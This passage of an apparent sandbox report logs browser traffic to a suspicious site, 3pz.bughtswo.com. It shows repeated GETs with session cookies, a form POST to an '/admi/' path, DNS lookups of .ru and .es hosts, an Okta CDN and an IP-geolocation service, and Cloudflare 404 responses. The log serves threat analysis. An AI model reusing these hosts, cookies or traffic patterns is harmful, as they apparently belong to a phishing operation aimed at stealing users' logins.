XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxp9c6hIYkZlyZ86ciJJym3vOmghEsersSKv43s9kEMB4L7S90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D

Source: global traffic	DNS traffic detected: DNS query: 3pz.bughtswo.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: developers.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: rxivb5.qakaco.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: y0wwlcczroc2mikkx8azepa6tnnyjj1ifs5xawhcmienblrzuz6qcrs.sorenxw.es
Source: global traffic	DNS traffic detected: DNS query: r7hi.qakaco.ru

Source: unknown

HTTP traffic detected: POST /soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveContent-Length: 775sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzxitO02XKJQjsAZysec-ch-ua-mobile: ?0Accept: */*Origin: https://3pz.bughtswo.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImptVVVvS0cvT2RNT0xtM1dleWpGREE9PSIsInZhbHVlIjoiQVI3VG5kWjJKZUE1NThlakF5ZWVxREVxYkZoYTl3YXBXbkVKM3BVQmlONVh4RmIyanFsZHdxYW9OT1VwZ0F3SU9mLzJTYmJteloyOEFsNVRHUEU1eHlsNmhkdGQwa3N5Q1FZRjFLaXN6a094NkJ3SVZHeXNJUG9MbDRldUlHelAiLCJtYWMiOiIyNjA4MTFmMWMxMzI0NzkxNTllMGJmNzA4NDM3ZWUzZDY2YzVjMGVlZTE1YTNkOGFlNzMxMzViYTQ5NDI5N2UxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkFubHVsZ1ZhcnU2RDIwUzFUdk5HZWc9PSIsInZhbHVlIjoieWQyY1U0bUNldXpDMm5PUDlOR1VXZHBHUTFLMU5PejNaRE5wYmM1a1k1UkZvbStYV3o4S09wb2s0Nk5oQ0NRcTRyVVFSaXhLWHFYVGpBaDN6T00zM1ZnZkFmc3dRKzY4L1pwSU1laDlrazYrRzM3Q0lHdG1TMHBXK2wzWTRpVmwiLCJtYWMiOiI5MWViNWE2NTIxYjMxYWVhMTczMGYyMTk0MmU0N2Q1Mzg5ODY4YTQwYTg3MTc1NjllYTRjMGI0NWIzZGQ5NzhmIiwidGFnIjoiIn0%3D

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUIoZMPRG8vNPXrCaUHRFNpOxoO0llmdTlI9mVFobnQAOUWQnaXEQlVSnhAlaQmc5PjrqdLzlhpkoxEhnWwQp8nObmN2xhfYGOFErumcN6nGbNNZXiWmUrbruaLH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25508&min_rtt=25474&rtt_var=9577&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2049&delivery_rate=111800&cwnd=32&unsent_bytes=0&cid=877e04fe5b75827c&ts=203&x=0"Server: cloudflareCF-RAY: 9220c2f3f9ce424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1888&rtt_var=722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1713&delivery_rate=1502057&cwnd=196&unsent_bytes=0&cid=9bf50957e8a4b790&ts=455&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: EXPIREDAge: 124Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVzePvwRjXXlW0DtY2JbYIaIFED%2FFzH6NDzh%2BDJPERrqfPGrhYPYDYS%2Bl%2FyKAR2TueoQvBI8Hny2nXo9xIHspToLbZ1aCk3HlOSoHRaqV%2B6yPV%2Bpvznx8Ya%2B7jsh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=25554&min_rtt=25484&rtt_var=9697&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2231&delivery_rate=109336&cwnd=32&unsent_bytes=0&cid=e06348e6ee44e26a&ts=45&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 9220c2f7fd7eb89f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2846&min_rtt=2842&rtt_var=1069&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1895&delivery_rate=1027445&cwnd=239&unsent_bytes=0&cid=9f686fdc4399a650&ts=300&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3JhBcvqOKOhlWS1PgWwqtauVvLf5cbPAHVtEYOT3g5C2gcIW4d%2BlayGptHy3T3U3uX07F8tA9Sa8xV7svZJae4ybmqo5w67fAJGOpO51GMr9D5MtViPSP3uv2b8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=26001&min_rtt=26000&rtt_var=9752&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2052&delivery_rate=109504&cwnd=32&unsent_bytes=0&cid=c5aa27dc89f54b0a&ts=202&x=0"Server: cloudflareCF-RAY: 9220c2fadc57566e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2089&min_rtt=2077&rtt_var=803&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1716&delivery_rate=1343764&cwnd=95&unsent_bytes=0&cid=9c8c0afe7265aaa8&ts=476&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8VUuRb2jU156aiG%2F7YeVZhjSKP45Jt3JENULp4gBO8UdlTC3lvvcRtsdaXjIvAYSc4fciUjCEkq00VyFnEclnE0r6lfBDBIuDec0OVSmtHZsYYI%2FclkPDn2%2FzXS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25590&min_rtt=25568&rtt_var=7230&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2061&delivery_rate=110955&cwnd=32&unsent_bytes=0&cid=15a30ed7a6143bf6&ts=217&x=0"Server: cloudflareCF-RAY: 9220c31468fede92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1577&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1727&delivery_rate=1737061&cwnd=226&unsent_bytes=0&cid=c9b7c05d6c0b4fce&ts=478&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USRuf0s1CZ4S0PBwdFn1KdjczBeiTGuaeY0uxaBVbfSIQhF612ZwPd2ogcLioNJ1B7KPfncQPmymRpVJfhfgmcDoPxHFZJWrBtaA2hPuhASm8EkZkl2MqunS9a95"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=27010&min_rtt=27006&rtt_var=10130&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2036&delivery_rate=105458&cwnd=32&unsent_bytes=0&cid=f3ed67058bf55a66&ts=190&x=0"Server: cloudflareCF-RAY: 9220c4447feb7095-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2456&min_rtt=2456&rtt_var=922&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1700&delivery_rate=1186509&cwnd=186&unsent_bytes=0&cid=9966a479b18e7c7a&ts=458&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYpf7rwrS6WxSjb5a%2FAaQ7fOP444pmOxjYMdns8SSp7Whk9yGgndKYH7kH6IyFfD8NQqyrd6lpKGP3G7AKTI6ivOogr0keilWW0XX6WwiA%2FEtZLw9Hz%2F8MEptDkm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25550&min_rtt=25538&rtt_var=9600&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2045&delivery_rate=111102&cwnd=32&unsent_bytes=0&cid=2de27d735b533d03&ts=193&x=0"Server: cloudflareCF-RAY: 9220c44d789a5f83-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1651&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1709&delivery_rate=1708601&cwnd=131&unsent_bytes=0&cid=30f25a8c383311a6&ts=458&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICVary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwne5Su0y4ydr3uvn8IB7xuZVHCJ4bDJwK8gNKRjquTOMlycWxWu52tlazPnn8KDmta7S8lNFt4ezqatZ5FvrjBHqx%2F0AasoEi%2FpHaNsGwwFCJ%2BfyzHwHlf3L11G"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server-Timing: 